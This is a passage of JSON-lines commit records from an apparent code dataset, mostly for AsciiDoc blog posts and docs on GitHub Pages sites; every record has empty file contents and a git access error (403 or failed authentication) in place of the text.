2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8525a5c124d315b750477554e70982bf21a12601","subject":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","message":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","new_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"499b763026615e24fe1668d4f27573e37be1576b","subject":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","message":"Update 
2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37769e13af020d74aad2e8e3c06f7c22a7b9b4b2","subject":"Update 2017-03-23-Hello-World.adoc","message":"Update 2017-03-23-Hello-World.adoc","repos":"jbutz\/hubpress-test,jbutz\/hubpress-test,jbutz\/hubpress-test,jbutz\/hubpress-test","old_file":"_posts\/2017-03-23-Hello-World.adoc","new_file":"_posts\/2017-03-23-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbutz\/hubpress-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b223ed82ac81cfc0bc5d5b1d2bda477cceef8db","subject":"Update 2018-05-02-G-A-S-Slack.adoc","message":"Update 2018-05-02-G-A-S-Slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-G-A-S-Slack.adoc","new_file":"_posts\/2018-05-02-G-A-S-Slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"464a09600a0afe95ce93f26ac5caccfb3214136f","subject":"Update 2017-03-17-iphone-irkit-arduino.adoc","message":"Update 2017-03-17-iphone-irkit-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-17-iphone-irkit-arduino.adoc","new_file":"_posts\/2017-03-17-iphone-irkit-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b09c57320c3fb0409596afd39ca6735e9001fcd","subject":"Update 2015-06-11-WalkingMapKyoto.adoc","message":"Update 2015-06-11-WalkingMapKyoto.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-11-WalkingMapKyoto.adoc","new_file":"_posts\/2015-06-11-WalkingMapKyoto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e90c571c4194d02254d39ace816e5b18d20817f4","subject":"Update 2017-11-04-Richard-Bellman.adoc","message":"Update 
2017-11-04-Richard-Bellman.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-11-04-Richard-Bellman.adoc","new_file":"_posts\/2017-11-04-Richard-Bellman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cc768ed0a1f53dda8b5f6e2c28e9003ab1d1144","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c031260fdefb73b677e1898c8277139009f9751e","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"853e312af08cc1ea25dad7f5d84a70f7285ddb27","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ebe7b09c01a3a6457da1fb79eb71f1a98ef7d89","subject":"Update 2019-12-23-Third-Anniversary.adoc","message":"Update 2019-12-23-Third-Anniversary.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-12-23-Third-Anniversary.adoc","new_file":"_posts\/2019-12-23-Third-Anniversary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6420af2a0080ca091aea07c8f375ca8eb3893f40","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 
2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e8497104ab25887e4fa9cdb23c6c702e1b101da","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2c7cb24b2b8df2f1fd13b240cd546a479cd3cf2","subject":"Create 2016-08-12-Why-Using-Framework.adoc","message":"Create 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da3048f6ca8ddb1aebe082116e8081043c12d5e1","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7beac66cb14469ae178f4aa03e2c028daacc082f","subject":"Update 2017-07-07-Cloud-Spanner.adoc","message":"Update 2017-07-07-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5036d06ef486b89b7e588269ab9c57bce382162","subject":"Update 2017-01-30-Introducing-a-new-blog.adoc","message":"Update 
2017-01-30-Introducing-a-new-blog.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-01-30-Introducing-a-new-blog.adoc","new_file":"_posts\/2017-01-30-Introducing-a-new-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03eb004fd71b600a449ba8ad09348cf29736e332","subject":"Update 2015-09-06-wen.adoc","message":"Update 2015-09-06-wen.adoc","repos":"suning-wireless\/Suning-Wireless.github.io,suning-wireless\/Suning-Wireless.github.io,suning-wireless\/Suning-Wireless.github.io","old_file":"_posts\/2015-09-06-wen.adoc","new_file":"_posts\/2015-09-06-wen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suning-wireless\/Suning-Wireless.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a0373057d392ba532f871819ae5bd6c458c480d","subject":"Update 2017-10-15-git.adoc","message":"Update 2017-10-15-git.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-15-git.adoc","new_file":"_posts\/2017-10-15-git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d40e69d3def92636fcc48f5e498430d873b8eb1","subject":"Update 2017-10-15-git.adoc","message":"Update 2017-10-15-git.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-15-git.adoc","new_file":"_posts\/2017-10-15-git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d331ff5c149278fbdadf494b9bd3bc415a478603","subject":"y2b create post Here's How To Make The iPhone Great Again...","message":"y2b create post Here's How To Make The iPhone Great Again...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-21-Heres-How-To-Make-The-iPhone-Great-Again.adoc","new_file":"_posts\/2017-03-21-Heres-How-To-Make-The-iPhone-Great-Again.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb52a4ac8bdcee94e93c27e91c4a7f7318a8a99a","subject":"Update 2017-05-04-Episode-97-Implausibility-Goggles-to-Max.adoc","message":"Update 
2017-05-04-Episode-97-Implausibility-Goggles-to-Max.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-05-04-Episode-97-Implausibility-Goggles-to-Max.adoc","new_file":"_posts\/2017-05-04-Episode-97-Implausibility-Goggles-to-Max.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fd8cc9844ca011162dc94521594c9dcdef78273","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4dd8980f2532eb09a7d3d22140a76f7147a4f02b","subject":"readme file updated","message":"readme file updated\n","repos":"axibase\/spring-boot,axibase\/spring-boot,axibase\/spring-boot,axibase\/spring-boot,axibase\/spring-boot","old_file":"spring-boot-samples\/spring-boot-sample-metrics-atsd\/README.adoc","new_file":"spring-boot-samples\/spring-boot-sample-metrics-atsd\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/axibase\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7f5e3b48529c0417c9099628d2ed84409768f789","subject":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","message":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d923d2c4edc25751feda9242774b35592fbbcb4c","subject":"y2b create post Laser Glow Headphones - What Magic Is This?","message":"y2b create post Laser Glow Headphones - What Magic Is This?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-06-Laser-Glow-Headphones--What-Magic-Is-This.adoc","new_file":"_posts\/2016-09-06-Laser-Glow-Headphones--What-Magic-Is-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1489a81f67d14b50cbc51a4cd294f32902abfd02","subject":"Update 2015-10-11-Maven-in-5-Minutes.adoc","message":"Update 
2015-10-11-Maven-in-5-Minutes.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Maven-in-5-Minutes.adoc","new_file":"_posts\/2015-10-11-Maven-in-5-Minutes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93b5f09fe7e569636d8ad29ef2edbc868f802348","subject":"Update 2016-07-17-Welcome-to-Juhoooo.adoc","message":"Update 2016-07-17-Welcome-to-Juhoooo.adoc","repos":"xumr0x\/xumr0x.github.io,xumr0x\/xumr0x.github.io,xumr0x\/xumr0x.github.io,xumr0x\/xumr0x.github.io","old_file":"_posts\/2016-07-17-Welcome-to-Juhoooo.adoc","new_file":"_posts\/2016-07-17-Welcome-to-Juhoooo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xumr0x\/xumr0x.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14962197ba2425360a21101b4598b5d5736a8c4d","subject":"Add news\/2016-08-10-forge-3.3.0.final.asciidoc","message":"Add news\/2016-08-10-forge-3.3.0.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-08-10-forge-3.3.0.final.asciidoc","new_file":"news\/2016-08-10-forge-3.3.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8d2916b862fba072c3444e10fc11f56c57d77179","subject":"Create Installation.adoc","message":"Create Installation.adoc","repos":"ClubCedille\/metaclub,ClubCedille\/metaclub","old_file":"doc\/Installation.adoc","new_file":"doc\/Installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ClubCedille\/metaclub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8d9eab285aa6499af345fd8b30aa5983475bbeb","subject":"Update 2016-09-19-Rant-The-Teletubbies-Documentation-Pitfall.adoc","message":"Update 2016-09-19-Rant-The-Teletubbies-Documentation-Pitfall.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2016-09-19-Rant-The-Teletubbies-Documentation-Pitfall.adoc","new_file":"_posts\/2016-09-19-Rant-The-Teletubbies-Documentation-Pitfall.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0bad8fb72bdc0e64e669a58743079b2c29e976b0","subject":"Created the SSO xPaaS doc. This doc has taken feedback from technical and peer review and is ready for publication.","message":"Created the SSO xPaaS doc. 
This doc has taken feedback from technical and peer review and is ready for publication.\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"using_images\/xpaas_images\/sso.adoc","new_file":"using_images\/xpaas_images\/sso.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0ea6fb3261e16dfbc61ddcf017d4d7dc84af09aa","subject":"Improve error page documentation","message":"Improve error page documentation\n\nCloses gh-5722\n","repos":"yhj630520\/spring-boot,afroje-reshma\/spring-boot-sample,sebastiankirsch\/spring-boot,chrylis\/spring-boot,javyzheng\/spring-boot,habuma\/spring-boot,bjornlindstrom\/spring-boot,afroje-reshma\/spring-boot-sample,vakninr\/spring-boot,mbenson\/spring-boot,pvorb\/spring-boot,htynkn\/spring-boot,felipeg48\/spring-boot,joshiste\/spring-boot,aahlenst\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,bclozel\/spring-boot,hqrt\/jenkins2-course-spring-boot,javyzheng\/spring-boot,vakninr\/spring-boot,vpavic\/spring-boot,hello2009chen\/spring-boot,chrylis\/spring-boot,ilayaperumalg\/spring-boot,wilkinsona\/spring-boot,bclozel\/spring-boot,brettwooldridge\/spring-boot,bclozel\/spring-boot,herau\/spring-boot,eddumelendez\/spring-boot,tiarebalbi\/spring-boot,jxblum\/spring-boot,zhanhb\/spring-boot,shakuzen\/spring-boot,bijukunjummen\/spring-boot,hello2009chen\/spring-boot,michael-simons\/spring-boot,qerub\/spring-boot,ihoneymon\/spring-boot,dreis2211\/spring-boot,DeezCashews\/spring-boot,mbenson\/spring-boot,yangdd1205\/spring-boot,lucassaldanha\/spring-boot,tiarebalbi\/spring-boot,ilayaperumalg\/spring-boot,i007422\/jenkins2-course-spring-boot,akmaharshi\/jenkins,i007422\/jenkins2-course-spring-boot,tsachev\/spring-boot,tsachev\/spring-boot,linead\/spring-boot,shangyi0102\/spring-boot,philwebb\/spring-boot,afroje-reshma\/spring-boot-sample,dreis2211\/spring-boot,i007422\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,bjornlindstrom\/spring-boot,aahlenst\/spring-boot,shangyi0102\/spring-boot,Buzzardo\/spring-boot,linead\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,vpavic\/spring-boot,jbovet\/spring-boot,kdvolder\/spring-boot,Nowheresly\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,wilkinsona\/spring-boot,rweisleder\/spring-boot,tsachev\/spring-boot,bjornlindstrom\/spring-boot,ollie314\/spring-boot,htynkn\/spring-boot,htynkn\/spring-boot,RichardCSantana\/spring-boot,Buzzardo\/spring-boot,htynkn\/spring-boot,herau\/spring-boot,yhj630520\/spring-boot,bbrouwer\/spring-boot,dreis2211\/spring-boot,herau\/spring-boot,tiarebalbi\/spring-boot,sbcoba\/spring-boot,jayarampradhan\/spring-boot,hqrt\/jenkins2-course-spring-boot,jbovet\/spring-boot,shakuzen\/spring-boot,akmaharshi\/jenkins,javyzheng\/spring-boot,candrews\/spring-boot,philwebb\/spring-boot,joshiste\/spring-boot,ilayaperumalg\/spring-boot,eddumelendez\/spring-boot,i007422\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,Nowheresly\/spring-boot,mdeinum\/spring-boot,ihoneymon\/spring-boot,nebhale\/spring-boot,hqrt\/jenkins2-course-spring-boot,pvorb\/spring-boot,qerub\/spring-boot,mosoft521\/spring-boot,kamilszymanski\/spring-boot,jayarampradhan\/spring-boot,nebhale\/spring-boot,mdeinum\/spring-boot,NetoDevel\/spring-boot,SaravananParthasarathy\/SPSDemo,ihoneymon\/spring-boot,
royclarkson\/spring-boot,mosoft521\/spring-boot,drumonii\/spring-boot,Nowheresly\/spring-boot,mosoft521\/spring-boot,mbogoevici\/spring-boot,pvorb\/spring-boot,bijukunjummen\/spring-boot,bclozel\/spring-boot,Buzzardo\/spring-boot,drumonii\/spring-boot,RichardCSantana\/spring-boot,vpavic\/spring-boot,shangyi0102\/spring-boot,mdeinum\/spring-boot,shangyi0102\/spring-boot,DeezCashews\/spring-boot,rweisleder\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,thomasdarimont\/spring-boot,NetoDevel\/spring-boot,jxblum\/spring-boot,royclarkson\/spring-boot,rweisleder\/spring-boot,ptahchiev\/spring-boot,thomasdarimont\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,kdvolder\/spring-boot,vpavic\/spring-boot,ilayaperumalg\/spring-boot,Buzzardo\/spring-boot,scottfrederick\/spring-boot,mdeinum\/spring-boot,sbcoba\/spring-boot,Nowheresly\/spring-boot,Buzzardo\/spring-boot,jvz\/spring-boot,joshthornhill\/spring-boot,jbovet\/spring-boot,scottfrederick\/spring-boot,vakninr\/spring-boot,habuma\/spring-boot,SaravananParthasarathy\/SPSDemo,michael-simons\/spring-boot,lexandro\/spring-boot,javyzheng\/spring-boot,NetoDevel\/spring-boot,minmay\/spring-boot,mbenson\/spring-boot,royclarkson\/spring-boot,spring-projects\/spring-boot,akmaharshi\/jenkins,royclarkson\/spring-boot,lburgazzoli\/spring-boot,zhanhb\/spring-boot,jvz\/spring-boot,RichardCSantana\/spring-boot,bbrouwer\/spring-boot,olivergierke\/spring-boot,michael-simons\/spring-boot,joshiste\/spring-boot,linead\/spring-boot,ilayaperumalg\/spring-boot,DeezCashews\/spring-boot,tiarebalbi\/spring-boot,vakninr\/spring-boot,shakuzen\/spring-boot,xiaoleiPENG\/my-project,ollie314\/spring-boot,hello2009chen\/spring-boot,olivergierke\/spring-boot,bclozel\/spring-boot,linead\/spring-boot,candrews\/spring-boot,joshthornhill\/spring-boot,mdeinum\/spring-boot,shangyi0102\/spring-boot,felipeg48\/spring-boot,michael-simons\/spring-boot,pvorb\/spring-boot,Nowheresly\/spring-boot,kdvolder\/spring-boot,jayarampradhan\/spring-boot,qerub\/spring-boot,dreis2211\/spring-boot,vakninr\/spring-boot,kamilszymanski\/spring-boot,zhanhb\/spring-boot,mbogoevici\/spring-boot,wilkinsona\/spring-boot,tsachev\/spring-boot,isopov\/spring-boot,brettwooldridge\/spring-boot,donhuvy\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,lexandro\/spring-boot,joshthornhill\/spring-boot,yhj630520\/spring-boot,shakuzen\/spring-boot,isopov\/spring-boot,mbogoevici\/spring-boot,drumonii\/spring-boot,olivergierke\/spring-boot,SaravananParthasarathy\/SPSDemo,nebhale\/spring-boot,kdvolder\/spring-boot,mbogoevici\/spring-boot,lucassaldanha\/spring-boot,jvz\/spring-boot,thomasdarimont\/spring-boot,DeezCashews\/spring-boot,RichardCSantana\/spring-boot,shakuzen\/spring-boot,brettwooldridge\/spring-boot,cleverjava\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,minmay\/spring-boot,javyzheng\/spring-boot,lburgazzoli\/spring-boot,ihoneymon\/spring-boot,yhj630520\/spring-boot,felipeg48\/spring-boot,SaravananParthasarathy\/SPSDemo,minmay\/spring-boot,herau\/spring-boot,philwebb\/spring-boot,lexandro\/spring-boot,felipeg48\/spring-boot,chrylis\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,joshiste\/spring-boot,nebhale\/spring-boot,donhuvy\/spring-boot,sebastiankirsch\/spring-boot,aahlenst\/spring-boot,kdvolder\/spring-boot,lburgazzoli\/spring-boot,habuma\/spring-boot,sebastiankirsch\/spring-boot,joshthornhill\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,
